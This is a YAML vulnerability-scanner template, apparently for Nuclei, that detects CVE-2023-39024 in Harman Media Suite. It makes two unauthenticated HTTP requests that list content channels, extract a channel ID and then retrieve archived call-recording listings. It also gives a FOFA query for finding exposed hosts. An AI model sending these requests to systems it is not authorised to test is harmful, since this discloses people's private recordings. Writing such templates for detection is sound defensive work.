58 lines
2.0 KiB
YAML
58 lines
2.0 KiB
YAML
id: CVE-2023-39024
|
|
|
|
info:
|
|
name: Harman Media Suite <= 4.2.0 - Local File Disclosure
|
|
author: s4e-io
|
|
severity: high
|
|
description: |
|
|
Harman Media Suite (versions 4.2.0 and below) are vulnerable to possible Local File Disclosure. This allows an unauthenticated user to potentially download attachments and recordings stored within the Media Suite application if anonymous access to the User Portal is enabled.
|
|
reference:
|
|
- https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC
|
|
- https://sploitus.com/exploit?id=C20FE0B5-806A-5687-850C-75D195576B35
|
|
- https://mediasuite.harman.com/channel-store
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: harman
|
|
product: media-suite
|
|
fofa-query: "Harman Media Suite"
|
|
tags: cve,cve2023,harman,media-suite,lfi
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body,"plcm-content-channel", "privacy", "coverImage")'
|
|
- 'contains(content_type, "application/vnd.plcm.plcm-content-channel-list+json")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
internal: true
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: channelId
|
|
group: 1
|
|
regex:
|
|
- '"channelId":"([^"]+)"'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body,"callId", "displayName", "duration")'
|
|
- 'contains(content_type, "application/vnd.plcm.plcm-csc+json")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a004730450220308de1868effffc01161d060b94953615926778af71ce9944d55b07e741e2019022100c80131e913327d1cfc14e6e0c47f0a283e597346c1cebb079a8ba60f9b0cf843:922c64590222798bb761d5b6d8e72950 |